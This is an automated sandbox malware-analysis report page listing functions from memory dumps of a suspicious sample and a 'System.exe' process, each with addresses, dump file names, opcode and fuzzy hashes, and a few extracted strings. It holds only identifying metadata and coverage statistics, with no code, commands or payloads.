Function 00007FFAAC4332F1 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC426000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC426000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac426000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 047f0ec99c59fd890083a29a21ec0769e000a4cb483ed6fa4e28ccde44bad51f
Instruction ID: bfdc44c1590c5247af59e1fee8e118ff69b864360548e7768268414cc01bb874
Opcode Fuzzy Hash: 047f0ec99c59fd890083a29a21ec0769e000a4cb483ed6fa4e28ccde44bad51f
Instruction Fuzzy Hash: A6016D7181868C8FDB44EF28C8496ED7FE0FF69304F4485AAE808C7261DB38E594CB81

Function 00007FFAAC44A5E9 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac43a000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebfda8910c419ff0b24f770a06c4a1a1ddddc4853856605b9c01c156eb7a7a44
Instruction ID: 3a2c94e480642c2fcf2f516fe5f373b760ba9e3e846cdf2321d96d057782c5e4
Opcode Fuzzy Hash: ebfda8910c419ff0b24f770a06c4a1a1ddddc4853856605b9c01c156eb7a7a44
Instruction Fuzzy Hash: 73018F3080878D8FCB59DF14C855AEA7FB0FF2A304F0441AAE409C72A2DB35D994CB80

Function 00007FFAAC44A6A9 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac43a000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d467ff360363f9b70c4f1fc14917ecc2dcc9f7b70889fc9d0e57dce910969e1
Instruction ID: f91c49bc52fef86f4534c7008bb5bd3d0deb0c8c96bb01aec66c17733138cfc6
Opcode Fuzzy Hash: 0d467ff360363f9b70c4f1fc14917ecc2dcc9f7b70889fc9d0e57dce910969e1
Instruction Fuzzy Hash: D101713090868C8FDB45DF24C855AAA7FB0FF15304F0041AAD409C71A2D735D994CB80

Function 00007FFAAC4447E9 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac43a000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b8193186342ef2627a0fc782edaeef29e5f829012ca9e238541fc20d464f809
Instruction ID: 13d70d36aec8049de9b3955b3def541ab30f40bc8ab156d1f717c6666157edf1
Opcode Fuzzy Hash: 0b8193186342ef2627a0fc782edaeef29e5f829012ca9e238541fc20d464f809
Instruction Fuzzy Hash: 9A017C7090868DCFDB85EF64C8546EABBB0FF15301F0405AAD41AC71A2DB34D954CB90

Function 00007FFAAC43B289 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac43a000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0360c72197e8dcb0e26bf2303975407b8fd4dacf0df314051cc1fafa8f11633a
Instruction ID: 9c1c8314f02b5ace8c2edcf703686b71f40dd40401324fdb8171dec18da357f3
Opcode Fuzzy Hash: 0360c72197e8dcb0e26bf2303975407b8fd4dacf0df314051cc1fafa8f11633a
Instruction Fuzzy Hash: 4D012C30909A8C8FDB86EF24C859AAD7FB0FF66304F0541DAD409C71A2DA35D998CB81

Function 00007FFAAC42A249 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC426000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC426000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac426000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf367b93952ac97db028b6bb814b0343a69e887455bc62cad9668578a2dbe8ed
Instruction ID: 25b172d24ebdb20c800542e046a536c17237ba8e01d3adbbddb965bf87d70055
Opcode Fuzzy Hash: bf367b93952ac97db028b6bb814b0343a69e887455bc62cad9668578a2dbe8ed
Instruction Fuzzy Hash: CB014F30908A8CCFDB95EF28C8596997FF0FF25300F0541D6E948C7162D634D554CB41

Function 00007FFAAC442CD9 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac43a000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13412ca2b0da265dc5d217c3a4e8b0cb609ce16998dedb88d65db80a3a2e7445
Instruction ID: 845a777df455184923107e67160f839e8cbe422f5a18d3240333b324f6061049
Opcode Fuzzy Hash: 13412ca2b0da265dc5d217c3a4e8b0cb609ce16998dedb88d65db80a3a2e7445
Instruction Fuzzy Hash: 3A018B3090D68C8FDB89EF24C858AA97FB0FF2A300F1441EAD409C71A2DB35D994CB80

Function 00007FFAAC43D8C0 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac43a000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a239b94b275badcf5cf9735d66671c1c04822adfb1296aac553cb8a1dd41eb04
Instruction ID: 5571e7cee1430cd9d46a08969ce558eb12fb825edf56f406d7d18f43ec41b3a4
Opcode Fuzzy Hash: a239b94b275badcf5cf9735d66671c1c04822adfb1296aac553cb8a1dd41eb04
Instruction Fuzzy Hash: CAF0C970914A4C9FDF48EF58C849AE97BF0FB68305F00456AA81DD3250DB30E594CB81

Function 00007FFAAC4481C9 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac43a000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfbec3f1b6ad7f3c9981bb2ec5847e31302bcbfecdf24b1d00f53fc206b88e24
Instruction ID: 34329f244922d87a9e06f095723a7e65df792234013ae25098022a6c94e454fd
Opcode Fuzzy Hash: dfbec3f1b6ad7f3c9981bb2ec5847e31302bcbfecdf24b1d00f53fc206b88e24
Instruction Fuzzy Hash: 26F028A080D789DFF755A774891D6A87FE0EF02300F0441F7D41DC60E3D93895588342

Function 00007FFAAC4086BD Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC407000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC407000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac407000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e1300b8d048b192e36e8bc65a59386a33965b1e46c91ed2743b007d102e19fd
Instruction ID: 8c0684b2c8fbbee5194ecb03f5bb95cf2acec0079ba9008276db621f98b48df6
Opcode Fuzzy Hash: 7e1300b8d048b192e36e8bc65a59386a33965b1e46c91ed2743b007d102e19fd
Instruction Fuzzy Hash: 65F06D7040868DCFDB95EF18C8556AA3BE0FF69300F4541A5E408C7562D774D868CB81

Function 00007FFAAC43B17F Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac43a000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa10e175c4073c52f28488201d74955d081243c935a6ef0941c56abb87dcaba7
Instruction ID: 4d6dc7264e277f528dd8c56433328ad8ec791a3c58c1d9d99d3f736dce2438dc
Opcode Fuzzy Hash: aa10e175c4073c52f28488201d74955d081243c935a6ef0941c56abb87dcaba7
Instruction Fuzzy Hash: 75F0493191844DDFDF84EF98C888DAEB7B1FF28344B0441AAD81ED7251CA31E951CB80

Function 00007FFAAC43B2A0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac43a000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d461409a86a236d8729de976d16166abad94e6f5490806f34e71ad8984e1c006
Instruction ID: 21ebf7da144249800017fbb18a92257c49467e84ee0e5ddc8867e6e77a9af3c4
Opcode Fuzzy Hash: d461409a86a236d8729de976d16166abad94e6f5490806f34e71ad8984e1c006
Instruction Fuzzy Hash: 4AF0A93091490D9FDF85EF58C448AAA7BB1FB69305F50419AA41DD3250DB319594CB80

Function 00007FFAAC407E9D Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC407000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC407000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac407000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: befb095dce206f336fdbc31df38270b33181eea14c7645d8519eb8ecc03a45a7
Instruction ID: 146140ceabdd7c5b5cb32eba04283e4cd146d140683ff96dd0d56b192afbe2e1
Opcode Fuzzy Hash: befb095dce206f336fdbc31df38270b33181eea14c7645d8519eb8ecc03a45a7
Instruction Fuzzy Hash: D1F03A7050978DCFDB86EF28D845A9A3BA0FF6A300F054196E41DC71A2D734E968CB82

Function 00007FFAAC42A260 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC426000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC426000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac426000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb309b843c4628ed3e8688d3c703f77a81f24c8775e9aab78553603a336c1d08
Instruction ID: 21d86eb9669e786192dea31cd21d7201c30baba84ef4718eb176ad2d26bc9ccb
Opcode Fuzzy Hash: bb309b843c4628ed3e8688d3c703f77a81f24c8775e9aab78553603a336c1d08
Instruction Fuzzy Hash: 19F0B730914A4DCFDF84EF68C489AAA7BE0FF28305F0045A6A819D3260DA30E5A4CB81

Function 00007FFAAC42F871 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC426000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC426000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac426000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1761095db7af0e4d489d3df7e3b1cd5f706d89429c0b911570f212c9d7ca929
Instruction ID: b48a57cb0d0c61faa48d65cc620a7ce1233ebcd5a773c97149c7d75b82957a6f
Opcode Fuzzy Hash: f1761095db7af0e4d489d3df7e3b1cd5f706d89429c0b911570f212c9d7ca929
Instruction Fuzzy Hash: E8F0173190994D8FEF84EF58C495ABDB7A0FF68304B10446AE41DD3190DB30E945CB80

Function 00007FFAAC447A58 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac43a000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6c2aba7224dfd3f779dc43dfcfc2c343d68f799b8af5db69a72b00bf1335587
Instruction ID: 91522dc0facbfd33f3f43cf90c085a5403d79ab5b2dcb14eab2bf85d71a1081c
Opcode Fuzzy Hash: f6c2aba7224dfd3f779dc43dfcfc2c343d68f799b8af5db69a72b00bf1335587
Instruction Fuzzy Hash: 0EF0F930904A0D9FDB84EF54C448AAABBA0FB69308F1041AAE41ED3250DB31E694CB80

Function 00007FFAAC442050 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac43a000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2bf1bb6c4ed614314b63b7fa3d5bd884960f858441a6eb222bdd87ff597e871
Instruction ID: 44b1837f8a8d7ec19052258536b83388d07e28a184d26ad9a21a5afaa35fd721
Opcode Fuzzy Hash: e2bf1bb6c4ed614314b63b7fa3d5bd884960f858441a6eb222bdd87ff597e871
Instruction Fuzzy Hash: A5F0F93491490D9FDF84EF54C448AAABBA0FB68305F1041AAE41ED3250CB31A594CB80

Function 00007FFAAC407CF5 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC407000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC407000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac407000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5eac82c755733027a73902d4b836734431802fc5df9da08ce5cd578aa6f567f5
Instruction ID: 3d3b43a5b0059d00e819df1df722d73b0b2b433765b372a4ed7b0837693dfbfe
Opcode Fuzzy Hash: 5eac82c755733027a73902d4b836734431802fc5df9da08ce5cd578aa6f567f5
Instruction Fuzzy Hash: A3F0A07584D68CEFEB92AB68C85D6AD7FF0FF16302F0545E6D409C6052DA389298C782

Function 00007FFAAC42C529 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC426000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC426000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac426000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 231b9a15e5cbbe24bbc22b41ebffd21d7f87ca07b7397184d0f95ee318a68c38
Instruction ID: bbec79492f5f9ee52dfb57544300f796e10baaa9f4e353d6f3bd5864d2e44b00
Opcode Fuzzy Hash: 231b9a15e5cbbe24bbc22b41ebffd21d7f87ca07b7397184d0f95ee318a68c38
Instruction Fuzzy Hash: 53F0A03590965FCFDB90DF18984ABEAB7B0EF52214F5043A6D42CC31E2DE309A918B44

Function 00007FFAAC40FA99 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC40B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC40B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac40b000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 449aca19a0e679f5a9d4cba81a8715524dfaa9294ad9dbb8c04d4932f6b46240
Instruction ID: f3fdb34cd773a6b90d6025a1bc8302613f301e8225d8480f927e749d8d7e2e81
Opcode Fuzzy Hash: 449aca19a0e679f5a9d4cba81a8715524dfaa9294ad9dbb8c04d4932f6b46240
Instruction Fuzzy Hash: D5F05E3190E7C98FEB56EF24891569DBFB0AF52310F4945EAD90CC7092D638D91CC781

Function 00007FFAAC3FCDDE Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC3F4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac3f4000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 936f77a0dfdb3ae540c63da7643dfbf4d61c9fd71dab273b8dc6c6339fef685f
Instruction ID: 7bf1c1cbc21ef4bb695e08f0fa9369231d5998204eb779d829140219a4115756
Opcode Fuzzy Hash: 936f77a0dfdb3ae540c63da7643dfbf4d61c9fd71dab273b8dc6c6339fef685f
Instruction Fuzzy Hash: BEF05E70D08A1A8BE7B4DB28DC55ABDB7A1EB84340F1081F6900DA2591CE352D868F80

Function 00007FFAAC442D55 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac43a000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2be858ebe905c19cf2cb7e26e81b4a675d80c6f5eb95a916fffe68a7db645bec
Instruction ID: b5d79c8f9a98a8ad5cf53ace281cdecb07d1c7a06a5c32f4bc0cb84de096deed
Opcode Fuzzy Hash: 2be858ebe905c19cf2cb7e26e81b4a675d80c6f5eb95a916fffe68a7db645bec
Instruction Fuzzy Hash: A6E04676A0940D9FDF19CF14C864CAD7761EF66315B2541A6D00FD7150DA31E946CB80

Function 00007FFAAC4344B4 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC426000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC426000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac426000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d2d8661b7171df99668568eeb2332c81d74482f62bbc0c8cb4900e7a8ca134d
Instruction ID: b16d3ca797141fe846486223d116c2372e76943df9f3bdbcdad0c50003ea6a96
Opcode Fuzzy Hash: 1d2d8661b7171df99668568eeb2332c81d74482f62bbc0c8cb4900e7a8ca134d
Instruction Fuzzy Hash: CAD0BD31A1491D8FEF90EB989844AECB7A1FB89211F00406A911DD3241DA34A9988B40

Function 00007FFAAC44A671 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac43a000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 415d1a698f71d6261abe2ad56ea235ad2041ba19544762569411c61487a2f57d
Instruction ID: dff45c807fd21e7466ab1f3197ca683fb6021a5bd116a0f19f4ff0fba63a7af4
Opcode Fuzzy Hash: 415d1a698f71d6261abe2ad56ea235ad2041ba19544762569411c61487a2f57d
Instruction Fuzzy Hash: 30D02EB2A08A48CBFB004B04E44A0FCB720EF02204F200474F00E82081DF24E98E86D2

Function 00007FFAAC446E44 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac43a000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd5c16f5ffad3841c68b38133e47e07aae0ae0dee90dea55cf0f2cc2b4df6411
Instruction ID: 9e06c55f2395484a00f6aa5ed6abb21737dbc5bd6b2b4fa48198016b7ee4f74e
Opcode Fuzzy Hash: fd5c16f5ffad3841c68b38133e47e07aae0ae0dee90dea55cf0f2cc2b4df6411
Instruction Fuzzy Hash: B1D0A964E05558CBFBA5AB0488897E567F2FB5A308F2042A5C08EC3102CE2448018B84

Non-executed Functions

Function 00007FFAAC3F7BFB Relevance: 5.1, Strings: 4, Instructions: 73COMMON

Download Yara Rule

Strings

N, xrefs: 00007FFAAC3F7C2C
F, xrefs: 00007FFAAC3F7C5C
{, xrefs: 00007FFAAC3F8051
(, xrefs: 00007FFAAC3F5BFD

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC3F4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac3f4000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID: ($F$N${
API String ID: 0-1239127037
Opcode ID: 9df5186999b771ed20bc07dded89dc9fa1fdc6f03e5aecba4a6118c99b591b97
Instruction ID: 72fd681720f3abdda1b828376c213d9f36d32839c3cf0620889a1ff09dc4ee96
Opcode Fuzzy Hash: 9df5186999b771ed20bc07dded89dc9fa1fdc6f03e5aecba4a6118c99b591b97
Instruction Fuzzy Hash: C131CC70D19A29CEEBA4DB18C845BA9B7F0FF55301F1085E9C14DA6281CE796EC8CF91

Analysis Process: System.exePID: 5900, Parent PID: 932COMMON

Execution Graph

Execution Coverage:	3.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFAAC40B86D Relevance: 10.6, Strings: 7, Instructions: 1816
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LK_H, xrefs: 00007FFAAC40D86D
_, xrefs: 00007FFAAC40C96C
p[, xrefs: 00007FFAAC40D242
6, xrefs: 00007FFAAC40DDF1
WK_H, xrefs: 00007FFAAC40CD72
}, xrefs: 00007FFAAC40BEE2
p[, xrefs: 00007FFAAC40CEED

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC40B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC40B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac40b000_System.jbxd

Similarity

API ID:
String ID: 6$ }$LK_H$WK_H$_$p[$p[
API String ID: 0-373628110
Opcode ID: 5d20ff6855c1f2cf56d0e1f24dc1458629650ab24c92bd7d483bd841d0ac7598
Instruction ID: 95734c9e1cacf7e2a34b2fd4b60a41a22c7d1c074776fa7dfbe387dcb83bc883
Opcode Fuzzy Hash: 5d20ff6855c1f2cf56d0e1f24dc1458629650ab24c92bd7d483bd841d0ac7598
Instruction Fuzzy Hash: 31F22FB0D09A59CFEB98DB18C895BA9B7B1FF55300F1081A9D00DE7296CE34AD85CF85

Function 00007FFAAC43A000 Relevance: 1.8, Strings: 1, Instructions: 504
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6, xrefs: 00007FFAAC43A0B3

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac43a000_System.jbxd

Similarity

API ID:
String ID: r6
API String ID: 0-2984296541
Opcode ID: c628b9650daaee4e31b74e66387ffa240c761f47dc23b7f50275bbc8d4eef502
Instruction ID: 4e342e0ea54ba38b0d8a27fa342f6c5de12fb729cb1c839dab6e606f71f8c3f3
Opcode Fuzzy Hash: c628b9650daaee4e31b74e66387ffa240c761f47dc23b7f50275bbc8d4eef502
Instruction Fuzzy Hash: 58224970D146198FDB18DFA8C494AECBBB1FF89304F148269D41AEB346DA34A985CF94

Function 00007FFAAC43D33D Relevance: .4, Instructions: 436
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac43a000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f5424bde40c4e88d3a29727b40467d2168fb4d04a106ff3b5765efb17e90395
Instruction ID: 1ce26945b5fe37f837bab2907b322af374953a3a48de86bcac88599e0e5f5e85
Opcode Fuzzy Hash: 1f5424bde40c4e88d3a29727b40467d2168fb4d04a106ff3b5765efb17e90395
Instruction Fuzzy Hash: B4F170B1D29A598FEB98DB58C455BF8B7E1FF55304F4481B9D00EE7292CE38A884CB41

Function 00007FFAAC43BA19 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac43a000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 390015aa1795083e03bcbbe36228203165774106fc9cdc943cc4e05c27582a16
Instruction ID: 16d8f917e0a40154e79a8bbbf20f27be6682707c6185c4d7bfe7e629fd94651f
Opcode Fuzzy Hash: 390015aa1795083e03bcbbe36228203165774106fc9cdc943cc4e05c27582a16
Instruction Fuzzy Hash: EA913170D19659CFEB64DB18C859BE8B7B1EF99304F1081BAD40DE3391CE34A9858F85

Function 00007FFAAC43B780 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac43a000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b91945ff32eff88466920bda2985131ea6d0f6421e7dcfacb5b78e835a496b0d
Instruction ID: 2415c08606e2db3271ac18afbb7fd9456c1896aaea2930d308f6bbd51b3ff728
Opcode Fuzzy Hash: b91945ff32eff88466920bda2985131ea6d0f6421e7dcfacb5b78e835a496b0d
Instruction Fuzzy Hash: 013121B0D18A5DCFEB84EF98C499AADBBF1FF99300F044176D40DD3295DA34A8848B84

Function 00007FFAAC448161 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac43a000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ad56e9516c44f61be2d28d2b03fb9ac4664d25e371947caa5c77744282ba684
Instruction ID: 249e5494983cbe34aac5de174fe62b01ef085f26e7541acca434195bdbd87bf7
Opcode Fuzzy Hash: 4ad56e9516c44f61be2d28d2b03fb9ac4664d25e371947caa5c77744282ba684
Instruction Fuzzy Hash: 0021A4A180D789CFF755AB6888596E97FE0EF12304F4481B7D55EC60E3DE3895588382

Function 00007FFAAC442000 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac43a000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1a222895923cf51eb2a2d16a96ac8284196ddc99385d08e7bd4bbdbdb2bf2ea
Instruction ID: 5e35288c9351042a89f06fa0a71a3bce4b54b22f7d14742f0194176ba9da60fd
Opcode Fuzzy Hash: c1a222895923cf51eb2a2d16a96ac8284196ddc99385d08e7bd4bbdbdb2bf2ea
